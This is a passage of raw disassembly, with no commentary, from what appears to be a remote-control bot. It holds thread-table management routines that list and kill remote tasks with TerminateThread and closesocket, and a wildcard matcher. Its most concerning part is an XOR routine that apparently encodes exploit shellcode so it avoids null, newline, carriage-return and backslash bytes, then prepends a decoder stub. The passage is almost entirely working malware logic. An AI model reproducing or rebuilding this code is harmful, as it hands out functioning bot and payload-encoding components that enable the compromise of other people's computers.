arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_C] ; int
push [ebp+Str] ; Str
call sub_40FFA4
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jbe short loc_40FFDF
xor eax, eax
jmp short locret_41004D
; ---------------------------------------------------------------------------
loc_40FFDF: ; CODE XREF: sub_40FFBD+1C�j
cmp [ebp+var_4], 0FFFFh
jbe short loc_40FFEC
xor eax, eax
jmp short locret_41004D
; ---------------------------------------------------------------------------
loc_40FFEC: ; CODE XREF: sub_40FFBD+29�j
push [ebp+arg_C] ; int
push [ebp+Str] ; Str
call sub_40FE0E
pop ecx
pop ecx
add eax, 101h
push eax ; Size
call _malloc
pop ecx
mov [ebp+Memory], eax
push [ebp+arg_C] ; int
push [ebp+Str] ; Str
push [ebp+arg_C] ; int
push [ebp+Str] ; Str
call sub_40FE0E
pop ecx
pop ecx
push eax ; int
push [ebp+Memory] ; int
call sub_40FE3E
add esp, 10h
mov [ebp+var_C], eax
push [ebp+var_C] ; int
push [ebp+Memory] ; int
push [ebp+arg_4] ; int
push [ebp+Dst] ; Dst
call sub_410081
add esp, 10h
mov [ebp+var_4], eax
push [ebp+Memory] ; Memory
call _free
pop ecx
mov eax, [ebp+var_4]
locret_41004D: ; CODE XREF: sub_40FFBD+20�j
; sub_40FFBD+2D�j
leave
retn
sub_40FFBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41004F proc near ; CODE XREF: sub_40FFA4+11�p
; sub_410081+83�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
and eax, 0FFh
test eax, eax
jnz short loc_410066
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
loc_410066: ; CODE XREF: sub_41004F+E�j
mov eax, 0FFh
cmp eax, [ebp+arg_0]
sbb eax, eax
and eax, 2
add eax, 15h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+arg_0]
leave
retn
sub_41004F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410081(void *Dst, int, int, int)
sub_410081 proc near ; CODE XREF: sub_40FFBD+79�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_C]
and eax, 0FFh
mov [ebp+var_4], al
movsx eax, [ebp+var_4]
cmp eax, 0Ah
jz short loc_4100B5
movsx eax, [ebp+var_4]
cmp eax, 0Dh
jz short loc_4100B5
movsx eax, [ebp+var_4]
cmp eax, 5Ch
jz short loc_4100B5
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_4100BC
loc_4100B5: ; CODE XREF: sub_410081+18�j
; sub_410081+21�j ...
mov eax, [ebp+arg_C]
inc eax
mov [ebp+arg_C], eax
loc_4100BC: ; CODE XREF: sub_410081+32�j
cmp [ebp+arg_C], 0FFh
jbe short loc_410101
mov eax, [ebp+arg_C]
shr eax, 8
and eax, 0FFh
mov [ebp+var_4], al
movsx eax, [ebp+var_4]
cmp eax, 0Ah
jz short loc_4100F6
movsx eax, [ebp+var_4]
cmp eax, 0Dh
jz short loc_4100F6
movsx eax, [ebp+var_4]
cmp eax, 5Ch
jz short loc_4100F6
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_410101
loc_4100F6: ; CODE XREF: sub_410081+59�j
; sub_410081+62�j ...
mov eax, [ebp+arg_C]
add eax, 100h
mov [ebp+arg_C], eax
loc_410101: ; CODE XREF: sub_410081+42�j
; sub_410081+73�j
push [ebp+arg_C]
call sub_41004F
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jbe short loc_41011C
xor eax, eax
jmp locret_41022F
; ---------------------------------------------------------------------------
loc_41011C: ; CODE XREF: sub_410081+92�j
cmp [ebp+var_8], 0FFFFh
jbe short loc_41012C
xor eax, eax
jmp locret_41022F
; ---------------------------------------------------------------------------
loc_41012C: ; CODE XREF: sub_410081+A2�j
mov al, byte_47027C
mov [ebp+var_C], al
and [ebp+var_10], 0
jmp short loc_410141
; ---------------------------------------------------------------------------
loc_41013A: ; CODE XREF: sub_410081:loc_41018A�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_410141: ; CODE XREF: sub_410081+B7�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_C]
jnb short loc_41018C
mov eax, [ebp+arg_8]
add eax, [ebp+var_10]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_C]
xor eax, ecx
mov [ebp+var_18], al
movsx eax, [ebp+var_18]
test eax, eax
jz short loc_41017E
movsx eax, [ebp+var_18]
cmp eax, 0Ah
jz short loc_41017E
movsx eax, [ebp+var_18]
cmp eax, 0Dh
jz short loc_41017E
movsx eax, [ebp+var_18]
cmp eax, 5Ch
jnz short loc_41018A
loc_41017E: ; CODE XREF: sub_410081+E0�j
; sub_410081+E9�j ...
mov al, [ebp+var_C]
add al, 1
mov [ebp+var_C], al
and [ebp+var_10], 0
loc_41018A: ; CODE XREF: sub_410081+FB�j
jmp short loc_41013A
; ---------------------------------------------------------------------------
loc_41018C: ; CODE XREF: sub_410081+C6�j
mov al, [ebp+var_C]
mov byte_47027C, al
cmp [ebp+arg_C], 0FFh
ja short loc_4101C8
mov al, byte ptr [ebp+arg_C]
mov byte_423901, al
mov al, [ebp+var_C]
mov byte_423905, al
push 15h ; Size
push offset dword_4238F4 ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 0Ch
mov [ebp+var_10], 15h
jmp short loc_4101FA
; ---------------------------------------------------------------------------
loc_4101C8: ; CODE XREF: sub_410081+11A�j
mov [ebp+var_1C], offset word_4238EA
mov eax, [ebp+var_1C]
mov cx, word ptr [ebp+arg_C]
mov [eax], cx
mov al, [ebp+var_C]
mov byte_4238EF, al
push 17h ; Size
push offset dword_4238DC ; Src
push [ebp+Dst] ; Dst
call _memcpy
add esp, 0Ch
mov [ebp+var_10], 17h
loc_4101FA: ; CODE XREF: sub_410081+145�j
and [ebp+var_14], 0
jmp short loc_410207
; ---------------------------------------------------------------------------
loc_410200: ; CODE XREF: sub_410081+1A9�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_410207: ; CODE XREF: sub_410081+17D�j
mov eax, [ebp+var_14]
cmp eax, [ebp+arg_C]
jnb short loc_41022C
mov eax, [ebp+arg_8]
add eax, [ebp+var_14]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+var_C]
xor eax, ecx
mov ecx, [ebp+var_10]
add ecx, [ebp+var_14]
mov edx, [ebp+Dst]
mov [edx+ecx], al
jmp short loc_410200
; ---------------------------------------------------------------------------
loc_41022C: ; CODE XREF: sub_410081+18C�j
mov eax, [ebp+var_8]
locret_41022F: ; CODE XREF: sub_410081+96�j
; sub_410081+A6�j
leave
retn
sub_410081 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410231(char *Source, int, int)
sub_410231 proc near ; CODE XREF: sub_404F31+113�p
; sub_404F31+294�p ...
var_4 = dword ptr -4
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_410242
; ---------------------------------------------------------------------------
loc_41023B: ; CODE XREF: sub_410231:loc_4102D8�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410242: ; CODE XREF: sub_410231+8�j
cmp [ebp+var_4], 1F4h
jge loc_4102DD
mov eax, [ebp+var_4]
imul eax, 234h
movsx eax, byte_42B340[eax]
test eax, eax
jnz short loc_4102D8
push 1FFh ; Count
push [ebp+Source] ; Source
mov eax, [ebp+var_4]
imul eax, 234h
add eax, offset byte_42B340
push eax ; Dest
call _strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
imul eax, 234h
mov ecx, [ebp+arg_4]
mov dword_42B540[eax], ecx
mov eax, [ebp+var_4]
imul eax, 234h
and dword_42B544[eax], 0
mov eax, [ebp+var_4]
imul eax, 234h
and dword_42B548[eax], 0
mov eax, [ebp+var_4]
imul eax, 234h
mov ecx, [ebp+arg_8]
mov dword_42B54C[eax], ecx
mov eax, [ebp+var_4]
imul eax, 234h
and byte ptr aUsaXpSp2667553[eax], 0 ; "USA|XP|SP2|667553"
jmp short loc_4102DD
; ---------------------------------------------------------------------------
loc_4102D8: ; CODE XREF: sub_410231+30�j
jmp loc_41023B
; ---------------------------------------------------------------------------
loc_4102DD: ; CODE XREF: sub_410231+18�j
; sub_410231+A5�j
mov eax, [ebp+var_4]
leave
retn
sub_410231 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_4102E2(LPVOID)
sub_4102E2 proc near ; DATA XREF: sub_40ABFE+1E5F�o
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 9Ch
push esi
push edi
mov esi, [ebp+arg_0]
push 26h
pop ecx
lea edi, [ebp+var_9C]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov dword ptr [eax+94h], 1
push [ebp+var_14]
push [ebp+var_10]
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_410340
add esp, 10h
push [ebp+var_18]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
sub_4102E2 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410340 proc near ; CODE XREF: sub_4102E2+3F�p
Dest = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 204h
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40A08D
add esp, 14h
and [ebp+var_4], 0
jmp short loc_41036E
; ---------------------------------------------------------------------------
loc_410367: ; CODE XREF: sub_410340:loc_4103E3�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41036E: ; CODE XREF: sub_410340+25�j
cmp [ebp+var_4], 1F4h
jge short locret_4103E5
mov eax, [ebp+var_4]
imul eax, 234h
movsx eax, byte_42B340[eax]
test eax, eax
jz short loc_4103E3
cmp [ebp+arg_C], 0
jnz short loc_4103A3
mov eax, [ebp+var_4]
imul eax, 234h
cmp dword_42B544[eax], 0
jnz short loc_4103E3
loc_4103A3: ; CODE XREF: sub_410340+4F�j
mov eax, [ebp+var_4]
imul eax, 234h
add eax, offset byte_42B340
push eax
push [ebp+var_4]
push offset aD_S_0 ; "%d. %s"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
push 1
push [ebp+arg_8]
lea eax, [ebp+Dest]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40A08D
add esp, 14h
loc_4103E3: ; CODE XREF: sub_410340+49�j
; sub_410340+61�j
jmp short loc_410367
; ---------------------------------------------------------------------------
locret_4103E5: ; CODE XREF: sub_410340+35�j
leave
retn
sub_410340 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103E7 proc near ; CODE XREF: sub_40ABFE+30AD�p
; sub_41050C+36�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
cmp [ebp+arg_0], 0
jle loc_410507
cmp [ebp+arg_0], 1F4h
jge loc_410507
push 0 ; dwExitCode
mov eax, [ebp+arg_0]
imul eax, 234h
push dword_42B554[eax] ; hThread
call ds:TerminateThread ; TerminateThread
mov eax, [ebp+arg_0]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_410436
mov [ebp+var_4], 1
loc_410436: ; CODE XREF: sub_4103E7+46�j
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B554[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B540[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B544[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
cmp dword_42B548[eax], 0
jbe short loc_41048D
mov eax, [ebp+arg_0]
imul eax, 234h
push dword_42B548[eax] ; dwProcessId
call sub_40F8C5
pop ecx
loc_41048D: ; CODE XREF: sub_4103E7+8F�j
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B548[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and byte_42B340[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and byte ptr aUsaXpSp2667553[eax], 0 ; "USA|XP|SP2|667553"
mov eax, [ebp+arg_0]
imul eax, 234h
push dword_42B54C[eax]
call dword_4264B8 ; closesocket
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B54C[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
push dword_42B550[eax]
call dword_4264B8 ; closesocket
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B550[eax], 0
loc_410507: ; CODE XREF: sub_4103E7+C�j
; sub_4103E7+19�j
mov eax, [ebp+var_4]
leave
retn
sub_4103E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41050C proc near ; CODE XREF: sub_408651:loc_408674�p
; sub_409C28+18�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_410522
; ---------------------------------------------------------------------------
loc_41051B: ; CODE XREF: sub_41050C:loc_410553�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410522: ; CODE XREF: sub_41050C+D�j
cmp [ebp+var_4], 1F4h
jge short loc_410555
mov eax, [ebp+var_4]
imul eax, 234h
movsx eax, byte_42B340[eax]
test eax, eax
jz short loc_410553
push [ebp+var_4]
call sub_4103E7
pop ecx
test eax, eax
jz short loc_410553
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_410553: ; CODE XREF: sub_41050C+31�j
; sub_41050C+3E�j
jmp short loc_41051B
; ---------------------------------------------------------------------------
loc_410555: ; CODE XREF: sub_41050C+1D�j
mov eax, [ebp+var_8]
leave
retn
sub_41050C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41055A proc near ; CODE XREF: sub_410663+2E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_410570
; ---------------------------------------------------------------------------
loc_410569: ; CODE XREF: sub_41055A:loc_4105D9�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410570: ; CODE XREF: sub_41055A+D�j
cmp [ebp+var_4], 1F4h
jge short loc_4105DB
mov eax, [ebp+var_4]
imul eax, 234h
mov eax, dword_42B540[eax]
cmp eax, [ebp+arg_0]
jnz short loc_4105D9
cmp [ebp+arg_4], 0
jle short loc_4105C5
mov eax, [ebp+var_4]
imul eax, 234h
mov eax, dword_42B544[eax]
cmp eax, [ebp+arg_4]
jz short loc_4105AF
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnz short loc_4105C3
loc_4105AF: ; CODE XREF: sub_41055A+4B�j
push [ebp+var_4]
call sub_4103E7
pop ecx
test eax, eax
jz short loc_4105C3
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4105C3: ; CODE XREF: sub_41055A+53�j
; sub_41055A+60�j
jmp short loc_4105D9
; ---------------------------------------------------------------------------
loc_4105C5: ; CODE XREF: sub_41055A+37�j
push [ebp+var_4]
call sub_4103E7
pop ecx
test eax, eax
jz short loc_4105D9
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4105D9: ; CODE XREF: sub_41055A+31�j
; sub_41055A:loc_4105C3�j ...
jmp short loc_410569
; ---------------------------------------------------------------------------
loc_4105DB: ; CODE XREF: sub_41055A+1D�j
mov eax, [ebp+var_8]
leave
retn
sub_41055A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105E0 proc near ; CODE XREF: sub_404EAD+B�p
; sub_404F31+2E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_4105F6
; ---------------------------------------------------------------------------
loc_4105EF: ; CODE XREF: sub_4105E0:loc_41061A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4105F6: ; CODE XREF: sub_4105E0+D�j
cmp [ebp+var_4], 1F4h
jge short loc_41061C
mov eax, [ebp+var_4]
imul eax, 234h
mov eax, dword_42B540[eax]
cmp eax, [ebp+arg_0]
jnz short loc_41061A
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_41061A: ; CODE XREF: sub_4105E0+31�j
jmp short loc_4105EF
; ---------------------------------------------------------------------------
loc_41061C: ; CODE XREF: sub_4105E0+1D�j
mov eax, [ebp+var_8]
leave
retn
sub_4105E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410621 proc near ; CODE XREF: sub_40ABFE+2849�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_410637
; ---------------------------------------------------------------------------
loc_410630: ; CODE XREF: sub_410621:loc_41065C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410637: ; CODE XREF: sub_410621+D�j
cmp [ebp+var_4], 1F4h
jge short loc_41065E
mov eax, [ebp+var_4]
imul eax, 234h
mov eax, dword_42B540[eax]
cmp eax, [ebp+arg_0]
jnz short loc_41065C
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_41065E
; ---------------------------------------------------------------------------
loc_41065C: ; CODE XREF: sub_410621+31�j
jmp short loc_410630
; ---------------------------------------------------------------------------
loc_41065E: ; CODE XREF: sub_410621+1D�j
; sub_410621+39�j
mov eax, [ebp+var_8]
leave
retn
sub_410621 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410663(int, int, int, int, int, int, int, char *Str)
sub_410663 proc near ; CODE XREF: sub_40ABFE+175A�p
; sub_40ABFE+17B2�p ...
var_208 = dword ptr -208h
Dest = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
Str = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 208h
and [ebp+var_208], 0
cmp [ebp+Str], 0
jz short loc_410688
push [ebp+Str] ; Str
call _atoi
pop ecx
mov [ebp+var_208], eax
loc_410688: ; CODE XREF: sub_410663+14�j
push [ebp+var_208]
push [ebp+arg_18]
call sub_41055A
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jle short loc_4106C0
push [ebp+var_4]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_4106DA
; ---------------------------------------------------------------------------
loc_4106C0: ; CODE XREF: sub_410663+3C�j
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
loc_4106DA: ; CODE XREF: sub_410663+5B�j
cmp [ebp+arg_C], 0
jnz short loc_4106FA
push 0
push [ebp+arg_8]
lea eax, [ebp+Dest]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40A08D
add esp, 14h
loc_4106FA: ; CODE XREF: sub_410663+7B�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
leave
retn
sub_410663 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410709 proc near ; CODE XREF: StartAddress+CE�p
; StartAddress+1E5�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B554[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B540[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B544[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B548[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B54C[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and dword_42B550[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and byte_42B340[eax], 0
mov eax, [ebp+arg_0]
imul eax, 234h
and byte ptr aUsaXpSp2667553[eax], 0 ; "USA|XP|SP2|667553"
pop ebp
retn
sub_410709 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41078E proc near ; CODE XREF: sub_40ABFE+D38�p
; sub_4109A7+D1�p ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 1
jmp short loc_4107A4
; ---------------------------------------------------------------------------
loc_41079D: ; CODE XREF: sub_41078E:loc_41083E�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
loc_4107A4: ; CODE XREF: sub_41078E+D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz loc_410843
cmp [ebp+var_4], 1
jnz loc_410843
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_410843
mov eax, [ebp+arg_0]
mov al, [eax]
mov [ebp+var_8], al
cmp [ebp+var_8], 2Ah
jz short loc_410806
cmp [ebp+var_8], 3Fh
jz short loc_4107FD
cmp [ebp+var_8], 5Bh
jz short loc_4107E2
jmp short loc_410821
; ---------------------------------------------------------------------------
loc_4107E2: ; CODE XREF: sub_41078E+50�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_410889
pop ecx
pop ecx
mov [ebp+var_4], eax
jmp short loc_41083E
; ---------------------------------------------------------------------------
loc_4107FD: ; CODE XREF: sub_41078E+4A�j
mov eax, [ebp+arg_4]
inc eax
mov [ebp+arg_4], eax
jmp short loc_41083E
; ---------------------------------------------------------------------------
loc_410806: ; CODE XREF: sub_41078E+44�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_4109A7
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
dec eax
mov [ebp+arg_0], eax
jmp short loc_41083E
; ---------------------------------------------------------------------------
loc_410821: ; CODE XREF: sub_41078E+52�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
sub eax, ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
inc eax
mov [ebp+arg_4], eax
loc_41083E: ; CODE XREF: sub_41078E+6D�j
; sub_41078E+76�j ...
jmp loc_41079D
; ---------------------------------------------------------------------------
loc_410843: ; CODE XREF: sub_41078E+1E�j
; sub_41078E+28�j ...
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_41085D
cmp [ebp+var_4], 1
jnz short loc_41085D
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_410843
; ---------------------------------------------------------------------------
loc_41085D: ; CODE XREF: sub_41078E+BE�j
; sub_41078E+C4�j
cmp [ebp+var_4], 1
jnz short loc_410880
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_410880
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_410880
mov [ebp+var_C], 1
jmp short loc_410884
; ---------------------------------------------------------------------------
loc_410880: ; CODE XREF: sub_41078E+D3�j
; sub_41078E+DD�j ...
and [ebp+var_C], 0
loc_410884: ; CODE XREF: sub_41078E+F0�j
mov eax, [ebp+var_C]
leave
retn
sub_41078E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410889 proc near ; CODE XREF: sub_41078E+63�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
and [ebp+var_8], 0
mov [ebp+var_C], 1
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
cmp eax, 21h
jnz short loc_4108BD
mov [ebp+var_8], 1
mov eax, [ebp+arg_0]
mov eax, [eax]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx], eax
loc_4108BD: ; CODE XREF: sub_410889+20�j
; sub_410889+F4�j
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
cmp eax, 5Dh
jnz short loc_4108D4
cmp [ebp+var_C], 1
jnz loc_410982
loc_4108D4: ; CODE XREF: sub_410889+3F�j
cmp [ebp+var_4], 0
jnz loc_41096E
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
cmp eax, 2Dh
jnz short loc_410953
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax-1]
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
movsx ecx, byte ptr [ecx+1]
cmp eax, ecx
jge short loc_410953
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax+1]
cmp eax, 5Dh
jz short loc_410953
cmp [ebp+var_C], 0
jnz short loc_410953
mov eax, [ebp+arg_4]
mov eax, [eax]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
movsx ecx, byte ptr [ecx-1]
cmp eax, ecx
jl short loc_410951
mov eax, [ebp+arg_4]
mov eax, [eax]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
movsx ecx, byte ptr [ecx+1]
cmp eax, ecx
jg short loc_410951
mov [ebp+var_4], 1
mov eax, [ebp+arg_0]
mov eax, [eax]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx], eax
loc_410951: ; CODE XREF: sub_410889+9F�j
; sub_410889+B4�j
jmp short loc_41096E
; ---------------------------------------------------------------------------
loc_410953: ; CODE XREF: sub_410889+60�j
; sub_410889+76�j ...
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
mov ecx, [ecx]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_41096E
mov [ebp+var_4], 1
loc_41096E: ; CODE XREF: sub_410889+4F�j
; sub_410889:loc_410951�j ...
mov eax, [ebp+arg_0]
mov eax, [eax]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx], eax
and [ebp+var_C], 0
jmp loc_4108BD
; ---------------------------------------------------------------------------
loc_410982: ; CODE XREF: sub_410889+45�j
cmp [ebp+var_8], 1
jnz short loc_410991
push 1
pop eax
sub eax, [ebp+var_4]
mov [ebp+var_4], eax
loc_410991: ; CODE XREF: sub_410889+FD�j
cmp [ebp+var_4], 1
jnz short loc_4109A2
mov eax, [ebp+arg_4]
mov eax, [eax]
inc eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_4109A2: ; CODE XREF: sub_410889+10C�j
mov eax, [ebp+var_4]
leave
retn
sub_410889 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109A7 proc near ; CODE XREF: sub_41078E+80�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], 1
mov eax, [ebp+arg_0]
mov eax, [eax]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx], eax
loc_4109BE: ; CODE XREF: sub_4109A7+60�j
mov eax, [ebp+arg_4]
mov eax, [eax]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_410A09
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jz short loc_4109E4
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_410A09
loc_4109E4: ; CODE XREF: sub_4109A7+2E�j
mov eax, [ebp+arg_0]
mov eax, [eax]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_4109FC
mov eax, [ebp+arg_4]
mov eax, [eax]
inc eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_4109FC: ; CODE XREF: sub_4109A7+48�j
mov eax, [ebp+arg_0]
